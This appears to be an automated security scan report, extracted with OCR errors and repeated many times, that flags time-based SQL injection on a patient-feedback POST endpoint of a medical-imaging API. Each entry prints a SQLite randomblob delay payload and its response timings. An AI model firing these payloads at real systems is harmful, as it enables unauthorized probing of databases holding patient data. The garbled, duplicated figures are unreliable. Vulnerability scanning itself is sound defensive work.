The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,430] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [5,128] milliseconds, when the original unmodified query with value [313] took [2,378] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Evidence

Other

Evidence

Other

Evidence

Other

Info

Info

Info

Attack case randomblob(100000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [2,434] milliseconds,

parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which

caused the request to take [2,563] milliseconds, when the original unmodified query with

value [675] took [1,915] milliseconds.

The query time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [2,434] milliseconds,

parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [2,563] milliseconds, when the original unmodified query with

value [675] took [1,915] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack case randomblob(100000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [2,482] milliseconds,

parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which

caused the request to take [4,752] milliseconds, when the original unmodified query with

value [312] took [1,676] milliseconds.

The query time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [2,482] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [4,752] milliseconds, when the original unmodified query with

value [312] took [1,676] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor-feedback

Method POST

Attack case randomblob(100000000) when not null then 1 else 1 end

The guery time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [2,690] milliseconds,

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

caused the request to take [4,868] milliseconds, when the original unmodified query with

value [0] took [4,171] milliseconds.

The query time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [2,690] milliseconds,

parameter value [case randomblob(1000000000)) when not null then 1 else 1 end], which caused the request to take [4,868] milliseconds, when the original unmodified query with

value [0] took [4,171] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack case randomblob(100000000) when not null then 1 else 1 end

The guery time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [2,692] milliseconds,

Evidence parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which

caused the request to take [3,380] milliseconds, when the original unmodified query with

value [451] took [784] milliseconds.

The query time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [2,692] milliseconds,

Other parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which

Info caused the request to take [3,380] milliseconds, when the original unmodified query with

value [451] took [784] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save doctor-feedback

Method POST

Attack case randomblob(100000000) when not null then 1 else 1 end

The guery time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [2,719] milliseconds,

parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which Evidence

caused the request to take [4,017] milliseconds, when the original unmodified query with

value [214] took [794] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [2,719] milliseconds,

parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [4,017] milliseconds, when the original unmodified query with

value [214] took [794] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(100000000) when not null then 1 else 1 end Attack

The query time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [2,858] milliseconds,

parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [6,354] milliseconds, when the original unmodified query with

value [294] took [2,321] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [2,858] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which

caused the request to take [6,354] milliseconds, when the original unmodified query with

value [294] took [2,321] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

case randomblob(100000000) when not null then 1 else 1 end Attack

The guery time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [2,900] milliseconds,

parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which

caused the request to take [3,455] milliseconds, when the original unmodified query with

value [0] took [2,033] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [2,900] milliseconds,

parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which

caused the request to take [3,455] milliseconds, when the original unmodified query with

value [0] took [2,033] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

Attack case randomblob(100000000) when not null then 1 else 1 end

> The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [294] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the

request to take [1,262] milliseconds, when the original unmodified query with value [1560]

took [2,994] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [294] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [1,262] milliseconds, when the original unmodified query with value [1560]

took [2,994] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save doctor feedback

Evidence

Other

Info

Other

Info

Evidence

Other Info

Evidence

Other Info

Method **POST**

Attack case randomblob(100000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [3,124] milliseconds,

parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which Evidence caused the request to take [3,415] milliseconds, when the original unmodified query with

value [549] took [1,301] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [3,124] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which

caused the request to take [3,415] milliseconds, when the original unmodified query with

value [549] took [1,301] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Other

Evidence

Other

Other

Evidence

Other

Info

Info

Info

Info

Attack case randomblob(100000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [3,265] milliseconds,

parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [4,981] milliseconds, when the original unmodified query with

value [295] took [2,341] milliseconds.

The query time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [3,265] milliseconds,

parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [4,981] milliseconds, when the original unmodified query with

value [295] took [2,341] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(100000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [3,340] milliseconds,

parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which Evidence

caused the request to take [3,667] milliseconds, when the original unmodified query with

value [295] took [788] milliseconds.

The query time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [3,340] milliseconds,

parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which

caused the request to take [3,667] milliseconds, when the original unmodified query with

value [295] took [788] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(100000000) when not null then 1 else 1 end

The guery time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [3,360] milliseconds,

parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [4,250] milliseconds, when the original unmodified query with

value [53] took [4,123] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000000) when

not null then 1 else 1 end], which caused the request to take [3,360] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [4,250] milliseconds, when the original unmodified query with

value [53] took [4,123] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(100000000) when not null then 1 else 1 end Attack

The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [3,474] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [3,565] milliseconds, when the original unmodified query with value [480] took [783] milliseconds.

Other Info The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [3,474] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [3,565] milliseconds, when the original unmodified query with value [480] took [783] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [784] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [1,731] milliseconds, when the original unmodified query with value [885] took [1,113] milliseconds.

Other Info The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [784] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [1,731] milliseconds, when the original unmodified query with value [885] took [1,113] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(10000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [786] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [1,636] milliseconds, when the original unmodified query with value [441] took [1,595] milliseconds.

Other Info The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [786] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,636] milliseconds, when the original unmodified query with value [441] took [1,595] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [790] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [2,191] milliseconds, when the original unmodified query with value [473] took [2,794] milliseconds.

Other Info The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [790] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [2,191] milliseconds, when the original unmodified query with value [473] took [2,794] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [916] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the

request to take [1,947] milliseconds, when the original unmodified guery with value [336] took [1,248] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [916] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [1,947] milliseconds, when the original unmodified query with value [336]

took [1,248] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(100000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [948] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [1,843] milliseconds, when the original unmodified query with value [505]

took [1,173] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [948] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [1,843] milliseconds, when the original unmodified query with value [505] took [1,173] milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback **URL**

POST Method

' | case randomblob(10000000) when not null then "" else "" end | ' Attack

> The query time is controllable using parameter value [' | case randomblob(10000000) when not null then "" else "" end | '], which caused the request to take [1,836] milliseconds, parameter value [' | case randomblob(100000000) when not null then "" else "" end | '], which caused the request to take [2,682] milliseconds, when the original unmodified query with

value [203] took [1,102] milliseconds.

The guery time is controllable using parameter value [' | case randomblob(10000000) when not null then "" else "" end | '], which caused the request to take [1,836] milliseconds, parameter value [' | case randomblob(100000000) when not null then "" else "" end | '], which caused the request to take [2,682] milliseconds, when the original unmodified query with

value [203] took [1,102] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(100000) when not null then 1 else 1 end Attack

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,048] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,621] milliseconds, when the original unmodified query with value [222]

took [938] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,048] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,621] milliseconds, when the original unmodified query with value [222] took [938] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(100000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,080] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,994] milliseconds, when the original unmodified query with value [677]

took [1,014] milliseconds.

The query time is controllable using parameter value [case randomblob(100000) when not

Other Info

Evidence

Other

Info

Evidence

Other Info

Evidence

Other Info

Attack

Other Info

null then 1 else 1 end], which caused the request to take [1,080] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,994] milliseconds, when the original unmodified query with value [677]

took [1,014] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,088] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [4,408] milliseconds, when the original unmodified query with value [261]

took [991] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,088] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [4,408] milliseconds, when the original unmodified query with value [261] took [991] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000) when not null then 1 else 1 end

Evidence

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,121] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,770] milliseconds, when the original unmodified query with value [193]

took [475] milliseconds.

Other Info

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,121] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,770] milliseconds, when the original unmodified query with value [193] took [475] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000) when not null then 1 else 1 end

Evidence

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,125] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,855] milliseconds, when the original unmodified query with value [72] took [778] milliseconds.

Other Info

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,125] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,855] milliseconds, when the original unmodified guery with value [72] took [778] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack case randomblob(100000) when not null then 1 else 1 end

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,164] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,863] milliseconds, when the original unmodified query with value [156]

Evidence

took [264] milliseconds. The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,164] milliseconds, parameter

Other

value [case randomblob(1000000) when not null then 1 else 1 end], which caused the Info

request to take [3,863] milliseconds, when the original unmodified query with value [156]

took [264] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

Evidence

Other

Evidence

Other

Evidence

Other

Evidence

Other

Info

Info

Info

URL

Info

Attack case randomblob(100000) when not null then 1 else 1 end

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,208] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,732] milliseconds, when the original unmodified query with value [239]

took [776] milliseconds.

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,208] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,732] milliseconds, when the original unmodified query with value [239]

took [776] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(100000) when not null then 1 else 1 end Attack

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,212] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,627] milliseconds, when the original unmodified query with value [651]

took [818] milliseconds.

took [818] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,212] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,627] milliseconds, when the original unmodified query with value [651]

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(100000) when not null then 1 else 1 end Attack

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,224] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,956] milliseconds, when the original unmodified query with value [220] took [777] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,224] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,956] milliseconds, when the original unmodified query with value [220]

took [777] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(100000) when not null then 1 else 1 end

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,228] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,026] milliseconds, when the original unmodified query with value [93] took

[771] milliseconds.

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,228] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,026] milliseconds, when the original unmodified query with value [93] took

[771] milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback **URL**

Method **POST** Attack case randomblob(100000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,267] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,189] milliseconds, when the original unmodified query with value [239]

took [259] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,267] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,189] milliseconds, when the original unmodified query with value [239]

took [259] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

case randomblob(100000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,288] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,174] milliseconds, when the original unmodified query with value [178]

took [1,215] milliseconds.

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,288] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,174] milliseconds, when the original unmodified query with value [178] took [1,215] milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST

case randomblob(100000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,298] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,371] milliseconds, when the original unmodified query with value [213]

took [1,261] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,298] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,371] milliseconds, when the original unmodified query with value [213]

took [1,261] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

Attack case randomblob(100000) when not null then 1 else 1 end

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,302] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [6,635] milliseconds, when the original unmodified query with value [227]

took [1,059] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,302] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [6,635] milliseconds, when the original unmodified query with value [227] took [1,059] milliseconds.

https://api.velmeni.ai/api/patient/scan/save doctor feedback

POST Method

URL

case randomblob(100000) when not null then 1 else 1 end

Other Info

Evidence

Attack

Evidence

Other

Info

Method

URL

Attack

Evidence

Other Info

Evidence

Other Info

Attack

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,305] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,989] milliseconds, when the original unmodified query with value [232] took [796] milliseconds.

Other Info The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,305] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,989] milliseconds, when the original unmodified query with value [232] took [796] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,309] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,763] milliseconds, when the original unmodified query with value [0] took [259] milliseconds.

Other Info The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,309] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,763] milliseconds, when the original unmodified query with value [0] took [259] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,317] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,855] milliseconds, when the original unmodified query with value [242] took [263] milliseconds.

Other Info The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,317] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,855] milliseconds, when the original unmodified query with value [242] took [263] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,338] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,216] milliseconds, when the original unmodified query with value [200] took [783] milliseconds.

Other Info The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,338] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,216] milliseconds, when the original unmodified query with value [200] took [783] milliseconds.

11110

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,342] milliseconds, parameter

Evidence

value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,350] milliseconds, when the original unmodified query with value [191] took [1,263] milliseconds.

Other Info The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,342] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,350] milliseconds, when the original unmodified query with value [191] took [1,263] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,347] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,360] milliseconds, when the original unmodified query with value [337.32679156135106] took [1,240] milliseconds.

Other

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,347] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,360] milliseconds, when the original unmodified query with value [337.32679156135106] took [1,240] milliseconds.

Info

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,404] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,760] milliseconds, when the original unmodified query with value [210] took [443] milliseconds.

Other Info The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,404] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,760] milliseconds, when the original unmodified query with value [210] took [443] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,435] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,293] milliseconds, when the original unmodified query with value [904] took [765] milliseconds.

Other Info The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,435] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,293] milliseconds, when the original unmodified query with value [904] took [765] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,465] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,760] milliseconds, when the original unmodified query with value [169] took [814] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,465] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,760] milliseconds, when the original unmodified query with value [169] took [814] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

case randomblob(100000) when not null then 1 else 1 end Attack

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,482] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,820] milliseconds, when the original unmodified query with value [254]

took [1,243] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,482] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,820] milliseconds, when the original unmodified query with value [254]

took [1,243] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST

case randomblob(100000) when not null then 1 else 1 end Attack

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,542] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,612] milliseconds, when the original unmodified guery with value [578]

took [1,031] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,542] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,612] milliseconds, when the original unmodified query with value [578]

took [1,031] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST

case randomblob(100000) when not null then 1 else 1 end

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,555] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,648] milliseconds, when the original unmodified query with value [337]

took [276] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,555] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,648] milliseconds, when the original unmodified query with value [337]

took [276] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

Attack case randomblob(100000) when not null then 1 else 1 end

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,561] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,990] milliseconds, when the original unmodified query with value [230]

took [1,285] milliseconds.

